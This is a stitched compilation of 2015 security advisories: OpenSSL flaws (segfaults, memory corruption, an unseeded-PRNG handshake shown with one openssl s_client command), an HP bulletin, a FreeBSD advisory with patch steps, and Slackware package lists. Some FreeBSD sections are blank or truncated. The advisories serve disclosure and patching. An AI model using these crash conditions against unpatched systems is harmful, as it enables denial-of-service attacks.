OpenSSL 1.0.2 introduced the "multiblock" performance improvement. This feature only applies on 64 bit x86 architecture platforms that support AES NI instructions. A defect in the implementation of "multiblock" can cause OpenSSL's internal write buffer to become incorrectly set to NULL when using non-blocking IO. Typically, when the user application is using a socket BIO for writing, this will only result in a failed connection. However if some other BIO is used then it is likely that a segmentation fault will be triggered, thus enabling a potential DoS attack.
This issue affects OpenSSL version: 1.0.2
OpenSSL 1.0.2 users should upgrade to 1.0.2a.
This issue was reported to OpenSSL on 13th February 2015 by Daniel Danner and Rainer Mueller. The fix was developed by Matt Caswell of the OpenSSL development team.
Segmentation fault in DTLSv1_listen (CVE-2015-0207)
Severity: Moderate
The DTLSv1_listen function is intended to be stateless and processes the initial ClientHello from many peers. It is common for user code to loop over the call to DTLSv1_listen until a valid ClientHello is received with an associated cookie. A defect in the implementation of DTLSv1_listen means that state is preserved in the SSL object from one invocation to the next that can lead to a segmentation fault. Errors processing the initial ClientHello can trigger this scenario. An example of such an error could be that a DTLS1.0 only client is attempting to connect to a DTLS1.2 only server.
This issue affects OpenSSL version: 1.0.2
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2a.
This issue was reported to OpenSSL on 27th January 2015 by Per Allansson. The fix was developed by Matt Caswell of the OpenSSL development team.
Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)
Severity: Moderate
The function ASN1_TYPE_cmp will crash with an invalid read if an attempt is made to compare ASN.1 boolean types. Since ASN1_TYPE_cmp is used to check certificate signature algorithm consistency this can be used to crash any certificate verification operation and exploited in a DoS attack. Any application which performs certificate verification is vulnerable including OpenSSL clients and servers which enable client authentication.
This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was discovered and fixed by Stephen Henson of the OpenSSL development team.
Segmentation fault for invalid PSS parameters (CVE-2015-0208)
Severity: Moderate
The signature verification routines will crash with a NULL pointer dereference if presented with an ASN.1 signature using the RSA PSS algorithm and invalid parameters. Since these routines are used to verify certificate signature algorithms this can be used to crash any certificate verification operation and exploited in a DoS attack. Any application which performs certificate verification is vulnerable including OpenSSL clients and servers which enable client authentication.
This issue affects OpenSSL version: 1.0.2
OpenSSL 1.0.2 users should upgrade to 1.0.2a
This issue was was reported to OpenSSL on 31st January 2015 by Brian Carpenter and a fix developed by Stephen Henson of the OpenSSL development team.
ASN.1 structure reuse memory corruption (CVE-2015-0287)
Severity: Moderate
Reusing a structure in ASN.1 parsing may allow an attacker to cause memory corruption via an invalid write. Such reuse is and has been strongly discouraged and is believed to be rare.
Applications that parse structures containing CHOICE or ANY DEFINED BY components may be affected. Certificate parsing (d2i_X509 and related functions) are however not affected. OpenSSL clients and servers are not affected.
This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was discovered by Emilia Käsper and a fix developed by Stephen Henson of the OpenSSL development team.
PKCS7 NULL pointer dereferences (CVE-2015-0289)
Severity: Moderate
The PKCS#7 parsing code does not handle missing outer ContentInfo correctly. An attacker can craft malformed ASN.1-encoded PKCS#7 blobs with missing content and trigger a NULL pointer dereference on parsing.
Applications that verify PKCS#7 signatures, decrypt PKCS#7 data or otherwise parse PKCS#7 structures from untrusted sources are affected. OpenSSL clients and servers are not affected.
This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was reported to OpenSSL on February 16th 2015 by Michal Zalewski (Google) and a fix developed by Emilia Käsper of the OpenSSL development team.
Base64 decode (CVE-2015-0292)
Severity: Moderate
A vulnerability existed in previous versions of OpenSSL related to the processing of base64 encoded data. Any code path that reads base64 data from an untrusted source could be affected (such as the PEM processing routines). Maliciously crafted base 64 data could trigger a segmenation fault or memory corruption. This was addressed in previous versions of OpenSSL but has not been included in any security advisory until now.
This issue affects OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1h. OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 0.9.8 users should upgrade to 0.9.8za.
The fix for this issue can be identified by commits d0666f289a (1.0.1), 84fe686173 (1.0.0) and 9febee0272 (0.9.8). This issue was originally reported by Robert Dugal and subsequently by David Ramos.
DoS via reachable assert in SSLv2 servers (CVE-2015-0293)
Severity: Moderate
A malicious client can trigger an OPENSSL_assert (i.e., an abort) in servers that both support SSLv2 and enable export cipher suites by sending a specially crafted SSLv2 CLIENT-MASTER-KEY message.
This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was discovered by Sean Burford (Google) and Emilia Käsper (OpenSSL development team) in March 2015 and the fix was developed by Emilia Käsper.
Empty CKE with client auth and DHE (CVE-2015-1787)
Severity: Moderate
If client auth is used then a server can seg fault in the event of a DHE ciphersuite being selected and a zero length ClientKeyExchange message being sent by the client. This could be exploited in a DoS attack.
This issue affects OpenSSL version: 1.0.2
OpenSSL 1.0.2 users should upgrade to 1.0.2a.
This issue was discovered and the fix was developed by Matt Caswell of the OpenSSL development team.
Handshake with unseeded PRNG (CVE-2015-0285)
Severity: Low
Under certain conditions an OpenSSL 1.0.2 client can complete a handshake with an unseeded PRNG. The conditions are: - The client is on a platform where the PRNG has not been seeded automatically, and the user has not seeded manually - A protocol specific client method version has been used (i.e. not SSL_client_methodv23) - A ciphersuite is used that does not require additional random data from the PRNG beyond the initial ClientHello client random (e.g. PSK-RC4-SHA).
If the handshake succeeds then the client random that has been used will have been generated from a PRNG with insufficient entropy and therefore the output may be predictable.
For example using the following command with an unseeded openssl will succeed on an unpatched platform:
openssl s_client -psk 1a2b3c4d -tls1_2 -cipher PSK-RC4-SHA
This issue affects OpenSSL version: 1.0.2
OpenSSL 1.0.2 users should upgrade to 1.0.2a.
This issue was discovered and the fix was developed by Matt Caswell of the OpenSSL development team.
Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)
Severity: Low
A malformed EC private key file consumed via the d2i_ECPrivateKey function could cause a use after free condition. This, in turn, could cause a double free in several private key parsing functions (such as d2i_PrivateKey or EVP_PKCS82PKEY) and could lead to a DoS attack or memory corruption for applications that receive EC private keys from untrusted sources. This scenario is considered rare.
This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was discovered by the BoringSSL project and fixed in their commit 517073cd4b. The OpenSSL fix was developed by Matt Caswell of the OpenSSL development team.
X509_to_X509_REQ NULL pointer deref (CVE-2015-0288)
Severity: Low
The function X509_to_X509_REQ will crash with a NULL pointer dereference if the certificate key is invalid. This function is rarely used in practice.
This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.2 users should upgrade to 1.0.2a OpenSSL 1.0.1 users should upgrade to 1.0.1m. OpenSSL 1.0.0 users should upgrade to 1.0.0r. OpenSSL 0.9.8 users should upgrade to 0.9.8zf.
This issue was discovered by Brian Carpenter and a fix developed by Stephen Henson of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these releases will be provided after that date. Users of these releases are advised to upgrade.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20150319.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html
.
Release Date: 2015-08-24 Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized access, or unauthorized disclosure of information.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Matrix Operating Environment. The vulnerabilities could be exploited remotely resulting in unauthorized modification, unauthorized access, or unauthorized disclosure of information.
References:
CVE-2010-5107 CVE-2013-0248 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-1692 CVE-2014-3523 CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8142 CVE-2014-8275 CVE-2014-9427 CVE-2014-9652 CVE-2014-9653 CVE-2014-9705 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 CVE-2015-0207 CVE-2015-0208 CVE-2015-0209 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-0285 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0290 CVE-2015-0291 CVE-2015-0292 CVE-2015-0293 CVE-2015-1787 CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792 CVE-2015-2134 CVE-2015-2139 CVE-2015-2140 CVE-2015-2301 CVE-2015-2331 CVE-2015-2348 CVE-2015-2787 CVE-2015-3113 CVE-2015-5122 CVE-2015-5123 CVE-2015-5402 CVE-2015-5403 CVE-2015-5404 CVE-2015-5405 CVE-2015-5427 CVE-2015-5428 CVE-2015-5429 CVE-2015-5430 CVE-2015-5431 CVE-2015-5432 CVE-2015-5433
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Matrix Operating Environment impacted software components and versions:
HP Systems Insight Manager (SIM) prior to version 7.5.0 HP System Management Homepage (SMH) prior to version 7.5.0 HP Version Control Agent (VCA) prior to version 7.5.0 HP Version Control Repository Manager (VCRM) prior to version 7.5.0 HP Insight Orchestration prior to version 7.5.0 HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3 CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the vulnerabilities in the impacted versions of HP Matrix Operating Environment
HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components bundled with the HP Matrix Operating Environment in the following HP Security Bulletins.
HP Matrix Operating Environment component HP Security Bulletin Number Security Bulletin Location
HP Systems Insight Manager (SIM) HPSBMU03394 HPSBMU03394 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744
HP System Management Homepage (SMH) HPSBMU03380 http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&la ng=en-us&cc=
HP Version Control Agent (VCA) HPSBMU03397 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169
HP Version Control Repository Manager (VCRM) HPSBMU03396 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04765115
HP Virtual Connect Enterprise Manager (VCEM) SDK HPSBMU03413 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04774021
HISTORY Version:1 (rev.1) - 24 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
References:
CVE-2014-0118 - Remote Denial of Service (DoS) CVE-2014-0226 - Remote Denial of Service (DoS) CVE-2014-0231 - Remote Denial of Service (DoS) CVE-2014-3523 - Remote Denial of Service (DoS) CVE-2014-3569 - Remote Denial of Service (DoS) CVE-2014-3570 - Remote Disclosure of Information CVE-2014-3571 - Remote Denial of Service (DoS) CVE-2014-3572 - Remote Disclosure of Information CVE-2014-8142 - Remote Code Execution CVE-2014-8275 - Unauthorized Modification CVE-2014-9427 - Remote Disclosure of Information CVE-2014-9652 - Remote Denial of Service (DoS) CVE-2014-9653 - Remote Denial of Service (DoS) CVE-2014-9705 - Remote Code Execution CVE-2015-0204 - Remote Disclosure of Information CVE-2015-0205 - Remote Unauthorized Access CVE-2015-0206 - Remote Denial of Service (DoS) CVE-2015-0207 - Remote Denial of Service (DoS) CVE-2015-0208 - Remote Denial of Service (DoS) CVE-2015-0209 - Remote Denial of Service (DoS) CVE-2015-0231 - Remote Denial of Service (DoS) CVE-2015-0232 - Remote Denial of Service (DoS), Execution of Arbitrary Code CVE-2015-0273 - Remote Execution of Arbitrary Code CVE-2015-0285 - Remote Disclosure of Information CVE-2015-0286 - Remote Denial of Service (DoS) CVE-2015-0287 - Remote Denial of Service (DoS) CVE-2015-0288 - Remote Denial of Service (DoS) CVE-2015-0289 - Remote Denial of Service (DoS) CVE-2015-0290 - Remote Denial of Service (DoS) CVE-2015-0291 - Remote Denial of Service (DoS) CVE-2015-0292 - Remote Denial of Service (DoS) CVE-2015-0293 - Remote Denial of Service (DoS) CVE-2015-1787 - Remote Denial of Service (DoS) CVE-2015-2301 - Remote Execution of Arbitrary Code CVE-2015-2331 - Remote Denial of Service (DoS), Execution of Arbitrary Code CVE-2015-2348 - Unauthorized Modification CVE-2015-2787 - Remote Execution of Arbitrary Code CVE-2015-2134 - Cross-site Request Forgery (CSRF) SSRT102109
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
============================================================================= FreeBSD-SA-15:06.openssl Security Advisory The FreeBSD Project
Topic: Multiple OpenSSL vulnerabilities
Category: contrib Module: openssl Announced: 2015-03-19 Affects: All supported versions of FreeBSD. Corrected: 2015-03-19 17:40:43 UTC (stable/10, 10.1-STABLE) 2015-03-19 17:42:38 UTC (releng/10.1, 10.1-RELEASE-p7) 2015-03-19 17:40:43 UTC (stable/9, 9.3-STABLE) 2015-03-19 17:42:38 UTC (releng/9.3, 9.3-RELEASE-p11) 2015-03-19 17:40:43 UTC (stable/8, 8.4-STABLE) 2015-03-19 17:42:38 UTC (releng/8.4, 8.4-RELEASE-p25) CVE Name: CVE-2015-0209, CVE-2015-0286, CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0293
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
I. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.
Abstract Syntax Notation One (ASN.1) is a standard and notation that describes rules and structures for representing, encoding, transmitting, and decoding data in telecommunications and computer networking, which enables representation of objects that are independent of machine-specific encoding technique.
II. [CVE-2015-0293]
III. [CVE-2015-0209]
A remote attacker who is able to send specifically crafted certificates may be able to crash an OpenSSL client or server. [CVE-2015-0287]
An attacker may be able to crash applications that create a new certificate request with subject name the same as in an existing, specifically crafted certificate.
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 8.4 and FreeBSD 9.3]
fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-0.9.8.patch
fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-0.9.8.patch.asc
gpg --verify openssl-0.9.8.patch.asc
[FreeBSD 10.1]
fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-1.0.1.patch
fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-1.0.1.patch.asc
gpg --verify openssl-1.0.1.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart all deamons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r280266 releng/8.4/ r280268 stable/9/ r280266 releng/9.3/ r280268 stable/10/ r280266 releng/10.1/ r280268
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. References
The latest revision of this advisory is available at
iQIcBAEBCgAGBQJVCwr1AAoJEO1n7NZdz2rnayEP/0w3Pba5k/1G0mJ1T9APNAns hhXm0YuR/rNJ1XBooWEOctrijlsVChcIt8KvJCU9apOZWjDvm/nvaQ077GCi5RSp jhQBs8MLVfXzwMbJ0/uBpp6ChF8uafk5O+gr8ulb2jG6VIaLkGOWPYv61aRYSGxy R7+6FxD8M0lLbGOQGETy1HxKzeWztA2p0ILORNAsi+bF8GSJpxGhSxqDDi4+ic/C 3oEw0zT/E6DhxJovOPebKq0eGcRbv7ETqDmtNQdqbOddV+0FY1E+nHtrAo6B/Kln rL+meBJHmLeEREROFk4OvCynuROUJGmXJGKwjN3uOVM05qcEZS4NkVhFNrxt6S5H t3wQ02SesbA3pbmce5OuXmlJgdL57DVlMb5sQjkqPeoJ6pn6Rz7VLSgLNfXDUSxs x/Lgx0+qLQUubMud7zT97UIvZmDqFTWXfJu5S/0Qt8BPFunmoNJttJ5Cr+brzEtu 5RLjcvkC1giVCpSXS96QbeT67uqSkMZa8gtII8bA77HBGA0Ky8AOwTAXbCiUovuH sLwsI8KUC3lsKUh7eyLsSm2+wRHn0e6dZ1PE0JRazCnCRboTvMWK2d4R7ANdrwsq CgtCWLRz6vbB9J4XTNupcEoZGhIA4RuOBqx43eQmaRw1HoV3vn85QP94oL5jzXBd UQg3YfrXHDlxCsqEzN7o =wi0T -----END PGP SIGNATURE----- .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1m-i486-1_slack14.1.txz: Upgraded.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zf-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zf-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zf-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1m-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1m-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1m-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1m-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1m-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1m-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1m-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1m-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 9ba57b2971962ceb6205ec7b7e6b84e7 openssl-0.9.8zf-i486-1_slack13.0.txz 706ef57bb71992961584a3d957c5dbcb openssl-solibs-0.9.8zf-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: 5f581b663798eacc8e7df4c292f33dbf openssl-0.9.8zf-x86_64-1_slack13.0.txz fe5f33f4d2db08b4f8d724e62bf6e514 openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 1ef0ba15454da786993361c927084438 openssl-0.9.8zf-i486-1_slack13.1.txz 2b3e20bcaa77f39512b6edcbc41b5471 openssl-solibs-0.9.8zf-i486-1_slack13.1.txz
